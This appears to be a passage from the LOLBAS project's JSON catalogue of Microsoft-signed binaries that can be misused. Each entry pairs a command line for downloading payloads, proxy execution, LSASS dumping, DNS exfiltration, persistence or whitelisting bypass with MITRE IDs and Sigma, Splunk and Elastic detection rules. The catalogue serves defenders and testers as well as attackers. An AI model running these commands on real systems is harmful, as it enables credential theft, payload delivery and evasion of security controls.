default"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"},{"IOC":"Process creation with given '-md' parameter"},{"IOC":"Anomalous child processes of procdump"},{"IOC":"Unsigned DLL load via procdump.exe or procdump64.exe"}],"Resources":[{"Link":"https://twitter.com/ajpc500/status/1448588362382778372?s=20"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"},{"Name":"ProtocolHandler.exe","Description":"Microsoft Office binary","Author":"Nir Chako","Created":"2022-07-24","Commands":[{"Command":"ProtocolHandler.exe https://example.com/payload","Description":"Downloads payload from remote server","Usecase":"It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe"},{"Path":"C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe"},{"Path":"C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml"},{"IOC":"Suspicious Office application Internet/network traffic"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"},{"Name":"rcsi.exe","Description":"Non-Interactive command line inerface included with Visual Studio.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"rcsi.exe bypass.csx","Description":"Use embedded C# within the csx script to execute the code.","Usecase":"Local execution of arbitrary C# code stored in local CSX file.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"rcsi.exe bypass.csx","Description":"Use embedded C# within the csx script to execute the code.","Usecase":"Local execution of arbitrary C# code stored in local CSX file.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"no default"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"BlockRule":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml"}],"Resources":[{"Link":"https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/"},{"Name":"Remote.exe","Description":"Debugging tool included with Windows Debugging Tools","Author":"mr.d0x","Created":"2021-06-01","Commands":[{"Command":"Remote.exe /s \"powershell.exe\" anythinghere","Description":"Spawns powershell as a child process of remote.exe","Usecase":"Executes a process under a trusted Microsoft signed binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"Remote.exe /s \"powershell.exe\" anythinghere","Description":"Spawns powershell as a child process of remote.exe","Usecase":"Executes a process under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"Remote.exe /s \"\\\\10.10.10.30\\binaries\\file.exe\" anythinghere","Description":"Run a remote file","Usecase":"Executing a remote binary without saving file to disk","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe"},{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"}],"Detection":[{"IOC":"remote.exe process spawns"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml"}],"Resources":[{"Link":"https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"},{"Name":"Sqldumper.exe","Description":"Debugging utility included with Microsoft SQL.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"sqldumper.exe 464 0 0x0110","Description":"Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).","Usecase":"Dump process using PID.","Category":"Dump","Privileges":"Administrator","MitreID":"T1003","OperatingSystem":"Windows"},{"Command":"sqldumper.exe 540 0 0x01100:40","Description":"0x01100:40 flag will create a Mimikatz compatible dump file.","Usecase":"Dump LSASS.exe to Mimikatz compatible dump using PID.","Category":"Dump","Privileges":"Administrator","MitreID":"T1003.001","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml"}],"Resources":[{"Link":"https://twitter.com/countuponsec/status/910969424215232518"},{"Link":"https://twitter.com/countuponsec/status/910977826853068800"},{"Link":"https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"},{"Name":"Sqlps.exe","Description":"Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\\100 and 110 are Powershell v2. Microsoft SQL Server\\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Sqlps.exe -noprofile","Description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","Usecase":"Execute PowerShell commands without ScriptBlock logging.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe"},{"Path":"C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe"},{"Path":"C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe"},{"Path":"C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml"},{"Elastic":"https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml"},{"Splunk":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"Resources":[{"Link":"https://twitter.com/ManuelBerrueta/status/1527289261350760455"},{"Link":"https://twitter.com/bryon_/status/975835709587075072"},{"Link":"https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"},{"Name":"SQLToolsPS.exe","Description":"Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"SQLToolsPS.exe -noprofile -command Start-Process calc.exe","Description":"Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging.","Usecase":"Execute PowerShell command.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows"}],"Full_Path":[{"Path":"C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml"},{"Splunk":"https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md"}],"Resources":[{"Link":"https://twitter.com/pabraeken/status/993298228840992768"},{"Link":"https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqltoolsps/"},{"Name":"Squirrel.exe","Description":"Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.","Author":"Reegun J (OCBC Bank) - @reegun21","Created":"2019-06-26","Commands":[{"Command":"squirrel.exe --download [url to package]","Description":"The above binary will go to url and look for RELEASES file and download the nuget package.","Usecase":"Download binary","Category":"Download","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"squirrel.exe --update [url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"squirrel.exe --update [url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"squirrel.exe --updateRoolback=[url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"squirrel.exe --updateRollback=[url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"}],"Full_Path":[{"Path":"%localappdata%\\Microsoft\\Teams\\current\\Squirrel.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"}],"Resources":[{"Link":"https://www.youtube.com/watch?v=rOP3hnkj7ls"},{"Link":"https://twitter.com/reegun21/status/1144182772623269889"},{"Link":"http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/"},{"Link":"https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12"},{"Link":"https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"},{"Name":"te.exe","Description":"Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF).","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"te.exe bypass.wsc","Description":"Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.","Usecase":"Execute Visual Basic script stored in local Windows Script Component file.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows"},{"Command":"te.exe test.dll","Description":"Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures.","Usecase":"Execute DLL file.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"},{"Input":"Custom Format"}]}],"Full_Path":[{"Path":"no default"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml"}],"Resources":[{"Link":"https://twitter.com/gn3mes1s/status/927680266390384640"},{"Link":"https://github.com/LOLBAS-Project/LOLBAS/pull/359"},{"Link":"https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/"},{"Name":"Teams.exe","Description":"Electron runtime binary which runs the Teams application","Author":"Andrew Kisliakov","Created":"2022-01-17","Commands":[{"Command":"teams.exe","Description":"Generate JavaScript payload and package.json, and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app\\\\\" before executing.","Usecase":"Execute JavaScript code","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"},{"Command":"teams.exe","Description":"Generate JavaScript payload and package.json, archive in ASAR file and save to \"%LOCALAPPDATA%\\\\Microsoft\\\\Teams\\\\current\\\\app.asar\" before executing.","Usecase":"Execute JavaScript code","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"},{"Command":"teams.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\system32\\cmd.exe /c ping google.com &&\"","Description":"Teams spawns cmd.exe as a child process of teams.exe and executes the ping command","Usecase":"Executes a process under a trusted Microsoft signed binary","Category":"Execute","Privileges":"User","MitreID":"T1218.015","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\Teams.exe"}],"Detection":[{"IOC":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created"},{"IOC":"%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml"}],"Resources":[{"Link":"https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"},{"Name":"TestWindowRemoteAgent.exe","Description":"TestWindowRemoteAgent.exe is the command-line tool to establish RPC","Author":"Onat Uzunyayla","Created":"2023-08-21","Commands":[{"Command":"TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000","Description":"Sends DNS query for open connection to any host, enabling exfiltration over DNS","Usecase":"Attackers may utilize this to exfiltrate data over DNS","Category":"Upload","Privileges":"User","MitreID":"T1048","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"}],"Detection":[{"IOC":"TestWindowRemoteAgent.exe spawning unexpectedly"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Testwindowremoteagent/"},{"Name":"Tracker.exe","Description":"Tool included with Microsoft .Net Framework.","Author":"Oddvar Moe","Created":"2018-05-25","Commands":[{"Command":"Tracker.exe /d .\\calc.dll /c C:\\Windows\\write.exe","Description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","Usecase":"Injection of locally stored DLL file into target process.","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"}]},{"Command":"Tracker.exe /d .\\calc.dll /c C:\\Windows\\write.exe","Description":"Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.","Usecase":"Injection of locally stored DLL file into target process.","Category":"AWL Bypass","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows","Tags":[{"Execute":"DLL"}]}],"Full_Path":[{"Path":"no default"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml"}],"Resources":[{"Link":"https://twitter.com/subTee/status/793151392185589760"},{"Link":"https://attack.mitre.org/wiki/Execution"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"},{"Name":"Update.exe","Description":"Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.","Author":"Oddvar Moe","Created":"2019-06-26","Commands":[{"Command":"Update.exe --download [url to package]","Description":"The above binary will go to url and look for RELEASES file and download the nuget package.","Usecase":"Download binary","Category":"Download","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --update=[url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --update=[url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --update=\\\\remoteserver\\payloadFolder","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","Usecase":"Download and execute binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --update=\\\\remoteserver\\payloadFolder","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","Usecase":"Download and execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --updateRollback=[url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --updateRollback=[url to package]","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package.","Usecase":"Download and execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --processStart payload.exe --process-start-args \"whatever args\"","Description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","Usecase":"Application Whitelisting Bypass","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --updateRollback=\\\\remoteserver\\payloadFolder","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","Usecase":"Download and execute binary","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --updateRollback=\\\\remoteserver\\payloadFolder","Description":"The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.","Usecase":"Download and execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --processStart payload.exe --process-start-args \"whatever args\"","Description":"Copy your payload into %userprofile%\\AppData\\Local\\Microsoft\\Teams\\current\\. Then run the command. Update.exe will execute the file you copied.","Usecase":"Execute binary","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --createShortcut=payload.exe -l=Startup","Description":"Copy your payload into \"%localappdata%\\Microsoft\\Teams\\current\\\". Then run the command. Update.exe will create a payload.exe shortcut in \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\". Then payload will run on every login of the user who runs it.","Usecase":"Execute binary","Category":"Execute","Privileges":"User","MitreID":"T1547","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"},{"Command":"Update.exe --removeShortcut=payload.exe -l=Startup","Description":"Run the command to remove the shortcut created in the \"%appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" directory you created with the LolBinExecution \"--createShortcut\" described on this page.","Usecase":"Execute binary","Category":"Execute","Privileges":"User","MitreID":"T1070","OperatingSystem":"Windows 7 and up with Microsoft Teams installed"}],"Full_Path":[{"Path":"%localappdata%\\Microsoft\\Teams\\update.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml"},{"IOC":"Update.exe spawned an unknown process"}],"Resources":[{"Link":"https://www.youtube.com/watch?v=rOP3hnkj7ls"},{"Link":"https://twitter.com/reegun21/status/1144182772623269889"},{"Link":"https://twitter.com/MrUn1k0d3r/status/1143928885211537408"},{"Link":"https://twitter.com/reegun21/status/1291005287034281990"},{"Link":"http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/"},{"Link":"https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12"},{"Link":"https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56"},{"Link":"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"},{"Name":"VSDiagnostics.exe","Description":"Command-line tool used for performing diagnostics.","Author":"Bobby Cooke","Created":"2023-07-12","Commands":[{"Command":"VSDiagnostics.exe start 1 /launch:calc.exe","Description":"Starts a collection session with sessionID 1 and calls kernelbase.CreateProcessW to launch specified executable.","Usecase":"Proxy execution of binary","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10, Windows 11"},{"Command":"VSDiagnostics.exe start 2 /launch:cmd.exe /launchArgs:\"/c calc.exe\"","Description":"Starts a collection session with sessionID 2 and calls kernelbase.CreateProcessW to launch specified executable. Arguments specified in launchArgs are passed to CreateProcessW.","Usecase":"Proxy execution of binary with arguments","Category":"Execute","Privileges":"User","MitreID":"T1127","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"}],"Detection":[{"Sigma":"https://github.com/tsale/Sigma_rules/blob/d5b4a09418edfeeb3a2d654f556d5bca82003cd7/LOL_BINs/VSDiagnostics_LoLBin.yml"}],"Resources":[{"Link":"https://twitter.com/0xBoku/status/1679200664013135872"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"},{"Name":"VSIISExeLauncher.exe","Description":"Binary will execute specified binary. Part of VS/VScode installation.","Author":"timwhite","Created":"2021-09-24","Commands":[{"Command":"VSIISExeLauncher.exe -p [PATH_TO_BIN] -a \"argument here\"","Description":"The above binary will execute other binary.","Usecase":"Execute any binary with given arguments.","Category":"Execute","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 and up with VS/VScode installed"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"}],"Detection":[{"Sigma":"https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml"},{"IOC":"VSIISExeLauncher.exe spawned an unknown process"}],"Resources":[{"Link":"https://github.com/timwhitez"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"},{"Name":"Visio.exe","Description":"Microsoft Visio Executable","Author":"Avihay Eldad","Created":"2024-02-15","Commands":[{"Command":"Visio.exe https://example.com/payload","Description":"Downloads payload from remote server","Usecase":"It will download a remote payload and place it in INetCache.","Category":"Download","Privileges":"User","MitreID":"T1105","OperatingSystem":"Windows","Tags":[{"Download":"INetCache"}]}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe"},{"Path":"C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe"},{"Path":"C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"}],"Detection":[{"IOC":"URL on a visio.exe command line"},{"IOC":"visio.exe making unexpected network connections or DNS requests"}],"Resources":null,"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"},{"Name":"VisualUiaVerifyNative.exe","Description":"A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls.","Author":"Jimmy (@bohops)","Created":"2021-09-26","Commands":[{"Command":"VisualUiaVerifyNative.exe","Description":"Generate Serialized gadget and save to - C:\\Users\\[current user]\\AppData\\Roaminguiverify.config before executing.","Usecase":"Execute proxied payload with Microsoft signed binary to bypass WDAC policies","Category":"AWL Bypass","Privileges":"User","MitreID":"T1218","OperatingSystem":"Windows 10 2004 (likely previous and newer versions as well)"}],"Full_Path":[{"Path":"c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe"},{"Path":"c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\x64\\UIAVerify\\VisualUiaVerifyNative.exe"},{"Path":"c:\\Program Files (x86)\\Windows Kits\\10\\bin\\[SDK version]\\UIAVerify\\VisualUiaVerifyNative.exe"}],"Detection":[{"BlockRule":"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules"},{"Sigma":"https://github.com/SigmaHQ/sigma/blob/6b34764215b0e97e32cbc4c6325fc933d2695c3a/rules/windows/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml"},{"IOC":"As a Windows SDK binary, execution on a system may be suspicious"}],"Resources":[{"Link":"https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/"},{"Link":"https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"},{"Name":"Vshadow.exe","Description":"VShadow is a command-line tool that can be used to create and manage volume shadow copies.","Author":"Ayberk Halaç","Created":"2023-09-06","Commands":[{"Command":"vshadow.exe -nw -exec=c:\\windows\\system32\\calc.exe C:","Description":"Executes calc.exe from vshadow.exe.","Usecase":"Performs execution of specified executable file.","Category":"Execute","Privileges":"Administrator","MitreID":"T1127","OperatingSystem":"Windows 10, Windows 11"}],"Full_Path":[{"Path":"C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.XXXXX.0\\x64\\vshadow.exe"}],"Detection":[{"IOC":"vshadow.exe usage with -exec parameter"}],"Resources":[{"Link":"https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample"}],"url":"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"},{"Name":"vsjitdebugger.exe","Description":"Just-In-Time 